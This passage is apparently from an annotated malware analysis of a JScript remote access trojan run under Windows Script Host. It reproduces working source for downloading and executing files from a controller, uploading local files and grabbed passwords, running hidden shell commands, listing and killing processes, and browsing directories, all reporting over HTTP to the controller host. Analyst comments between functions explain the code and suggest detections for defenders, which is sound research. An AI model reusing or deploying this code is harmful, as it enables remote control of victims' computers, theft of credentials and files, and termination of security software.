  528. strsaveto = filedir + fileurl.substr(fileurl.lastIndexOf("\\") + 1);
  529. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  530. objhttpdownload.open("post", "http://" + host + ":" + port + "/" + "send-to-me" + spliter + fileurl, false);
  531. objhttpdownload.setRequestHeader("user-agent:", information());
  532. objhttpdownload.send("");
  533. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  534. if (objfsodownload.fileExists(strsaveto)) {
  535. objfsodownload.deleteFile(strsaveto);
  536. }
  537. if (objhttpdownload.status == 200) {
  538. var objstreamdownload = WScript.CreateObject("adodb.stream");
  539. objstreamdownload.Type = 1;
  540. objstreamdownload.Open();
  541. objstreamdownload.Write(objhttpdownload.responseBody);
  542. objstreamdownload.SaveToFile(strsaveto);
  543. objstreamdownload.close();
  544. objstreamdownload = null;
  545. }
  546. if (objfsodownload.fileExists(strsaveto)) {
  547. shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
  548. updatestatus("Executed+File");
  549. }
  550. }
  551.  
  // updatestatus(status_msg): reports a status string to the controller with an empty-bodied POST
  // to http://<host>:<port>/update-status|<status_msg>, using a fresh msxml2.xmlhttp object.
  // Status strings used in this listing: "UAC+Disabled+(Reboot+Required)", "Client+Elevated",
  // "Client+Not+Elevated", "Executed+File". Errors are not caught here; they propagate to the caller.
  // Analyst note: the "update-status|" URL path plus these literal strings are usable in proxy-log searches.
  552. function updatestatus(status_msg) {
  553. var objsoc = WScript.CreateObject("msxml2.xmlhttp");
  554. objsoc.open("post", "http://" + host + ":" + port + "/" + "update-status" + spliter + status_msg, false);
  555. objsoc.setRequestHeader("user-agent:", information());
  556. objsoc.send("");
  557. }
  558.  
  // upload(fileurl, retcmd): sends a local file to the controller.
  //   fileurl - local path read in binary mode through adodb.stream.
  //   retcmd  - URL path for the POST (for example "take-log" from the "bring-log" command).
  // The whole file is read into memory and posted as the request body to
  // http://<host>:<port>/<retcmd>. `httpobj` is redeclared locally, so the shared top-level
  // object is not used here. Errors are not caught in this function.
  // Analyst note: this is the exfiltration path for log files and for the passgrabber() output;
  // look for POSTs with binary or text bodies to the controller address from wscript.exe.
  559. function upload(fileurl, retcmd) {
  560. var httpobj, objstreamuploade, buffer;
  561. var objstreamuploade = WScript.CreateObject("adodb.stream");
  562. objstreamuploade.Type = 1;
  563. objstreamuploade.Open();
  564. objstreamuploade.loadFromFile(fileurl);
  565. buffer = objstreamuploade.Read();
  566. objstreamuploade.close();
  567. objstreamdownload = null;
  568. var httpobj = WScript.CreateObject("msxml2.xmlhttp");
  569. httpobj.open("post", "http://" + host + ":" + port + "/" + retcmd, false);
  570. httpobj.setRequestHeader("user-agent:", information());
  571. httpobj.send(buffer);
  572. }
  573.  
  // deletefaf(url): attempts deleteFile and then deleteFolder on the same path inside one try
  // block, swallowing any error. If deleteFile throws, deleteFolder is not attempted.
  // Used by passgrabber() to remove the downloaded executable after it has run, which is why
  // that file may be absent from disk during later forensic collection.
  574. function deletefaf(url) {
  575. try {
  576. filesystemobj.deleteFile(url);
  577. filesystemobj.deleteFolder(url);
  578. } catch (err) {}
  579. }
  580.  
  // cmdshell(cmd): handler for the "cmd-shell" command. Runs
  //   %comspec% /c <cmd> > "<installdir>out.txt"
  // hidden (window style 0) and waits for it to finish, reads the whole output file, deletes it,
  // and returns the text, which the caller posts to /is-cmd-shell.
  // `cmd` is controller-supplied text concatenated directly into the command line.
  // Analyst note: cmd.exe as a child of wscript.exe with output redirected to out.txt in %temp%
  // is a reliable process-creation detection for this capability.
  581. function cmdshell(cmd) {
  582. var httpobj, oexec, readallfromany;
  583. var strsaveto = installdir + "out.txt";
  584. shellobj.run("%comspec% /c " + cmd + " > \"" + strsaveto + "\"", 0, true);
  585. readallfromany = filesystemobj.openTextFile(strsaveto).readAll();
  586. try {
  587. filesystemobj.deleteFile(strsaveto);
  588. } catch (ee) {}
  589. return readallfromany;
  590. }
  591.  
  // enumprocess(): handler for the "get-processes" command. Queries win32_process through WMI and
  // returns one record per process in the form  <name>^<processId>^<executablePath>|  .
  // Errors are swallowed; whatever was collected before the error is returned.
  // The caller posts the result to /is-processes.
  592. function enumprocess() {
  593. var ep = "";
  594. try {
  595. var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
  596. var colitems = objwmiservice.ExecQuery("select * from win32_process", null, 48);
  597. for (var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()) {
  598. var objitem = fi.item();
  599. ep = ep + objitem.name + "^";
  600. ep = ep + objitem.processId + "^";
  601. ep = ep + objitem.executablePath + spliter;
  602. }
  603. } catch (er) {}
  604. return ep;
  605. }
  606.  
  // exitprocess(pid): handler for the "kill-process" command. Runs
  //   taskkill /F /T /PID <pid>
  // hidden and waits for completion; errors are swallowed. `pid` is controller-supplied text.
  // Analyst note: taskkill with /F /T launched by wscript.exe, particularly against security
  // tooling, is worth alerting on.
  607. function exitprocess(pid) {
  608. try {
  609. shellobj.run("taskkill /F /T /PID " + pid, 0, true);
  610. } catch (err) {}
  611. }
  612.  
  // getParentDirectory(path): resolves `path` to a File object and returns the value of
  // getParentFolderName for it. Analyst note: no call to this helper appears in this listing.
  613. function getParentDirectory(path) {
  614. var fo = filesystemobj.getFile(path);
  615. return filesystemobj.getParentFolderName(fo);
  616. }
  617.  
  // enumfaf(enumdir): lists the contents of a directory for the "browse-logs" command
  // (called with <installdir>wshlogs). Record formats, each terminated by "|":
  //   sub-folder:  <name>^^d^<attributes>
  //   file:        <name>^<size>^<attributes>
  // Errors are swallowed; whatever was collected before the error is returned.
  // The caller posts the result to /is-logs.
  618. function enumfaf(enumdir) {
  619. var re = "";
  620. try {
  621. for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).subfolders); !fi.atEnd(); fi.moveNext()) {
  622. var folder = fi.item();
  623. re = re + folder.name + "^^d^" + folder.attributes + spliter;
  624. }
  625. for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).files); !fi.atEnd(); fi.moveNext()) {
  626. var file = fi.item();
  627. re = re + file.name + "^" + file.size + "^" + file.attributes + spliter;
  628. }
  629. } catch (err) {}
  630. return re;
  631. }